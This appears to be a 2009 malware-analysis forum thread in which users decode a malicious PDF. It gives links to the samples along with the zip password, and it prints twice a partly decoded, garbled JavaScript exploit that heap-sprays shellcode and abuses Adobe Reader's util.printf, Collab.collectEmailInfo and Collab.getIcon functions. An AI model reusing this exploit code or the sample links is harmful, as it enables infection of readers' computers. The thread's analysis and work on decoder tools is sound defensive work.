Malware Domain List

Malware Related => Malware Analysis => Topic started by: Garlando on December 19, 2009, 09:03:11 am

Title: PDF Failed to decode
Post by: Garlando on December 19, 2009, 09:03:11 am
I tried with PDFTK and PDF-PARSER.PY

and both fails, i get this on PDF-PARSER

'ASCIIHexDecode decompress failed'


Title: Re: PDF Failed to decode
Post by: SysAdMini on December 19, 2009, 09:21:39 am
Please don't attach malware unprotected !!!! Please use a password protected zip file next time.


I came across this sample too today. It can be found at
Code: [Select]
kijojg.net/fr/files/leerydumbbunny.pdf
I'm not aware of any tool that is able to decode the stream.

A second sample is here
Code: [Select]
kijojg.net/fr/files/scamtodosomething.pdf
password : infected
Title: Re: PDF Failed to decode
Post by: parody on December 19, 2009, 09:33:43 am
/LZWDecode support added.

/RunLengthDecode  support is odd. Not sure if i've done it right :P

but if you edit the pdf and remove the /RunLengthDecode from the filter list you can get a partial decode. Enough to see this...


Code: [Select]
eval(unescape("%6V6%75%6E%63%74%69%6F%6E%20%64%68%63%58%45%4C%73%50%28%65%61%4B%2C%52%5A%43%4B%73%29%7B%7%68%69%6C%65%28%65%61%4B%2E%6C%65%6E%67%74%68%2A%32%20%3C%20%52%5A%43%4B%73%29%7B%65%61%4B%2B%3D%65%61%4B%3B%7D%65%61%4B%3D%65%l61%4B%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%52%5A%43%4B%73%2F%32%29%3B%72%65%74%75%72%6E%20%65%61%4B%3B%7D%686%75%6E%63%74%69%6F%6E%20%75%74%69%6C%5F%70%72%69%6E%74%6J6%28%29%7B%76%61%72%20%42%58%4C%53%57%73%52%3D%75%6E%65%73%63%61%70%65%28%2
There is much more than that but I put it through an unescape decoder at http://gutterbunny.com/unescape.html (http://gutterbunny.com/unescape.html) and I get the next layer of output...


Code: [Select]
"%6V6unction dhcXELsP(eaK,RZCKs){%7hile(eaK.length*2 < RZCKs){eaK+=eaK;}eaK=e%l61K.substring(0,RZCKs/2);return eaK;}h6unction util_print%6J6(){var BXLSWsR=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                          3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u503%4J4%u6972%u746E%u5066%u4644");var %7/7Waqvr=unescape(%2J2%u0A0A%u0A0A%u0A0A%u0A0A%2 2);var PeAp%4m=}7Waqvr+BXLSWsR;var Fhvm%5#5J=unescape(%2&2%u0A0A%u0A0A-2);var SuCYr=20;var haS%4&4X=SuCYr+PeApDm.length;while(Fhvm%5,5J.length < haSDX){FhvmUJ+=Fhvm%5>5J;}var ajxACMQa=FhvmU5J.substring(0,haS%4/4X);var Htv=FhvmX5J.substring(0,Fhvm%5&5J.length-haS%4
                                                                 4X);%7;7hile(Htv.length+haS%4X<0x40000){Htv=Htv+Htv+ajxACMQa;}var cRq=new Array();%6t6or(var i=0;i<1400;i++){cRq[i]=Htv+PeAp%4m;}var yhqqMJvA=129999999999999999998888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%88888888888888888888888888888888888888888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%8888888888888888888888888888888888888888888%K388888888888888;util.printf("%45000f%2&2,yhqqMJvA);}%6_6unction collab_email(){var %uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                                 3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                       3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%Z428%uE0CE%uFF60%u0455=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                           3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                 3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u453D%u616H4%u6C69%u4450%u0046%2&2);var cRq=ne%7)7 Array();var %4J4zGt=0x0c0c0c0c;var ZEcGsB4=0x400000;var OqDtL=%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                     3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                           3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF428%uE0CE%uFF60%u0455.length*2;var RZCKs=ZEcGsD-(OqDtL+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2z2);eaK=dhcXELsP(eaK,RZCKs);var WuJzgMSg=(%4;4zGt-0x400000)/ZEcGsD;%6&6or(var HXvCWU=0;HXvCWU5 < WuJzgMSg;HXvCW%5)5++){cRq[HXvCW%5 5]=eaK+%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                             3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                   3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%N428%uE0CE%uFF60%u0455;}var %5&5OW=unescape(%2&2%u0c0c%u0c0c%2);while(U5OW.length<44952){UOW+=%5OW;}this.collabStore=Collab.collectEmailIn%6o({subj:"",msg:UOW});}%6P6unction collab_geticon(){i%6q6(app.doc.Collab.getIcon){var VmmLQ=nex7 Array();var QnkOy%6 6=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                    3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                          3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u473D%u7465%u6%3>349%u6E6F%u4450%u0046%2/2);var QKh=QnkOy%6n6.length*2;var RZCKs=0x400000-(QKh+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2);eaK=dhcXELsP(eaK,RZCKs);var KMvc=(0x0c0c%H30c0c-0x400000)/0x400000;%6or(var PXCtFz=0;PXCtFz < KMvc;PXCtFz++){Vm%?6DLQ[PXCtFz]=eaK+QnkOy%6J6;}var cLxARQHR=unescape(%2
                                                                                                         2%09%2);%7hile(cLxARQHR.length<0x4000){cLxARQHR+=cLx1RQHR;}cLxARQHR=%2N.%2+cLxARQHR;app.doc.Collab.getIcon(cLxARQHR)% 3B}}%6 6unction bA%4G4EJFF(){var bzLA=app.vie%7}7erVersion.toString();bzLA=bzLA.replace(/\%4
                                                             4/g,""2);var cmQVSxL=ne%7 Array(bzLA.charAt(0),bzLA.charAt(1),bzLA.%$63harAt(2));i%6((cmQVSxL[0]==8)&&(cmQVSxL[1]==0)||(cmQVSx%<4C[1]==1&&cmQVSxL[2]<%3)3)){util_printf();}i%6((cmQVSxL[0]<8)||(cmQVSxL[0]==8&&cmQVSxL[1%o5D<2&&cmQVSxL[2]<2)){collab_email();}i%6((cmQVSxL[0]<9)||(cmQVSxL[0]==9&&cmQVSxL[1%Q5D<1)){collab_geticon();}}bADEJFF();

So if you look through the mess that gets output, we can see Collab.getIcon  and Collab.collectEmail being abused as usual. I'll clean up this code and upload it somewhere for people to grab.   http://gutterbunny.com/pdfparser-parody.zip (http://gutterbunny.com/pdfparser-parody.zip)



ps. first time really coding in python which is prolly why my code is crap :D
Title: Re: PDF Failed to decode
Post by: origami on December 22, 2009, 04:47:50 pm
I can not grab these files, but I'd like to test them on our pdf framework:

http://security-labs.org/origami

Title: Re: PDF Failed to decode
Post by: SysAdMini on December 22, 2009, 04:52:34 pm
I can not grab these files, but I'd like to test them on our pdf framework:

http://security-labs.org/origami



Files are attached in the 2nd message of this topic. Direct link to attachment is:

http://www.malwaredomainlist.com/forums/index.php?action=dlattach;topic=3626.0;attach=539
Title: Re: PDF Failed to decode
Post by: origami on December 22, 2009, 06:50:07 pm
oups, thank u :)

origami/src/scripts/antivir>> ruby extractjs.rb /tmp/leerydumbbunny.pdf
--------------------------------------------------------------------------------
* Found the following scripts in /tmp/leerydumbbunny.pdf :
--------------------------------------------------------------------------------
../../parser/stream.rb:299:in `decodedata': Error while decoding stream 4 0 R (Origami::InvalidStream)
   -> [Origami::Filter::InvalidLZWData] LZW table is full and no clear flag was set

Good a bug to fix ;)

origami/src/scripts/antivir>> ruby extractjs.rb /tmp/scamtodosomething.pdf
--------------------------------------------------------------------------------
* Found the following scripts in /tmp/scamtodosomething.pdf :
--------------------------------------------------------------------------------
eval(unescape("%76%61%72%20%6D%65%6D%6F%72%79...)

Better, no bug to fix :-D
Title: Re: PDF Failed to decode
Post by: malware on January 06, 2010, 09:33:26 am
/LZWDecode support added.

/RunLengthDecode  support is odd. Not sure if i've done it right :P

but if you edit the pdf and remove the /RunLengthDecode from the filter list you can get a partial decode. Enough to see this...


Code: [Select]
eval(unescape("%6V6%75%6E%63%74%69%6F%6E%20%64%68%63%58%45%4C%73%50%28%65%61%4B%2C%52%5A%43%4B%73%29%7B%7%68%69%6C%65%28%65%61%4B%2E%6C%65%6E%67%74%68%2A%32%20%3C%20%52%5A%43%4B%73%29%7B%65%61%4B%2B%3D%65%61%4B%3B%7D%65%61%4B%3D%65%l61%4B%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%52%5A%43%4B%73%2F%32%29%3B%72%65%74%75%72%6E%20%65%61%4B%3B%7D%686%75%6E%63%74%69%6F%6E%20%75%74%69%6C%5F%70%72%69%6E%74%6J6%28%29%7B%76%61%72%20%42%58%4C%53%57%73%52%3D%75%6E%65%73%63%61%70%65%28%2
There is much more than that but I put it through an unescape decoder at http://gutterbunny.com/unescape.html (http://gutterbunny.com/unescape.html) and I get the next layer of output...


Code: [Select]
"%6V6unction dhcXELsP(eaK,RZCKs){%7hile(eaK.length*2 < RZCKs){eaK+=eaK;}eaK=e%l61K.substring(0,RZCKs/2);return eaK;}h6unction util_print%6J6(){var BXLSWsR=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                          3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u503%4J4%u6972%u746E%u5066%u4644");var %7/7Waqvr=unescape(%2J2%u0A0A%u0A0A%u0A0A%u0A0A%2 2);var PeAp%4m=}7Waqvr+BXLSWsR;var Fhvm%5#5J=unescape(%2&2%u0A0A%u0A0A-2);var SuCYr=20;var haS%4&4X=SuCYr+PeApDm.length;while(Fhvm%5,5J.length < haSDX){FhvmUJ+=Fhvm%5>5J;}var ajxACMQa=FhvmU5J.substring(0,haS%4/4X);var Htv=FhvmX5J.substring(0,Fhvm%5&5J.length-haS%4
                                                                 4X);%7;7hile(Htv.length+haS%4X<0x40000){Htv=Htv+Htv+ajxACMQa;}var cRq=new Array();%6t6or(var i=0;i<1400;i++){cRq[i]=Htv+PeAp%4m;}var yhqqMJvA=129999999999999999998888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%88888888888888888888888888888888888888888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%8888888888888888888888888888888888888888888%K388888888888888;util.printf("%45000f%2&2,yhqqMJvA);}%6_6unction collab_email(){var %uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                                 3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                       3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%Z428%uE0CE%uFF60%u0455=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                           3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                 3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u453D%u616H4%u6C69%u4450%u0046%2&2);var cRq=ne%7)7 Array();var %4J4zGt=0x0c0c0c0c;var ZEcGsB4=0x400000;var OqDtL=%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                     3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                           3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF428%uE0CE%uFF60%u0455.length*2;var RZCKs=ZEcGsD-(OqDtL+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2z2);eaK=dhcXELsP(eaK,RZCKs);var WuJzgMSg=(%4;4zGt-0x400000)/ZEcGsD;%6&6or(var HXvCWU=0;HXvCWU5 < WuJzgMSg;HXvCW%5)5++){cRq[HXvCW%5 5]=eaK+%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                             3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                   3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%N428%uE0CE%uFF60%u0455;}var %5&5OW=unescape(%2&2%u0c0c%u0c0c%2);while(U5OW.length<44952){UOW+=%5OW;}this.collabStore=Collab.collectEmailIn%6o({subj:"",msg:UOW});}%6P6unction collab_geticon(){i%6q6(app.doc.Collab.getIcon){var VmmLQ=nex7 Array();var QnkOy%6 6=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                    3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                          3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u473D%u7465%u6%3>349%u6E6F%u4450%u0046%2/2);var QKh=QnkOy%6n6.length*2;var RZCKs=0x400000-(QKh+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2);eaK=dhcXELsP(eaK,RZCKs);var KMvc=(0x0c0c%H30c0c-0x400000)/0x400000;%6or(var PXCtFz=0;PXCtFz < KMvc;PXCtFz++){Vm%?6DLQ[PXCtFz]=eaK+QnkOy%6J6;}var cLxARQHR=unescape(%2
                                                                                                         2%09%2);%7hile(cLxARQHR.length<0x4000){cLxARQHR+=cLx1RQHR;}cLxARQHR=%2N.%2+cLxARQHR;app.doc.Collab.getIcon(cLxARQHR)% 3B}}%6 6unction bA%4G4EJFF(){var bzLA=app.vie%7}7erVersion.toString();bzLA=bzLA.replace(/\%4
                                                             4/g,""2);var cmQVSxL=ne%7 Array(bzLA.charAt(0),bzLA.charAt(1),bzLA.%$63harAt(2));i%6((cmQVSxL[0]==8)&&(cmQVSxL[1]==0)||(cmQVSx%<4C[1]==1&&cmQVSxL[2]<%3)3)){util_printf();}i%6((cmQVSxL[0]<8)||(cmQVSxL[0]==8&&cmQVSxL[1%o5D<2&&cmQVSxL[2]<2)){collab_email();}i%6((cmQVSxL[0]<9)||(cmQVSxL[0]==9&&cmQVSxL[1%Q5D<1)){collab_geticon();}}bADEJFF();

So if you look through the mess that gets output, we can see Collab.getIcon  and Collab.collectEmail being abused as usual. I'll clean up this code and upload it somewhere for people to grab.   http://gutterbunny.com/pdfparser-parody.zip (http://gutterbunny.com/pdfparser-parody.zip)



ps. first time really coding in python which is prolly why my code is crap :D


I have used the same samples provided, how come I cannot have the same result? I have installed phyton. Removed the /RunLengthDecode filter.

Usage: pdf-parser.py [option] {sample file}

Is this correct?
Title: Re: PDF Failed to decode
Post by: parody on January 06, 2010, 01:09:49 pm
I still had to add a decoder for the LZWDecode filter, a basic one is listed in the version of pdf-parser I list in my other post.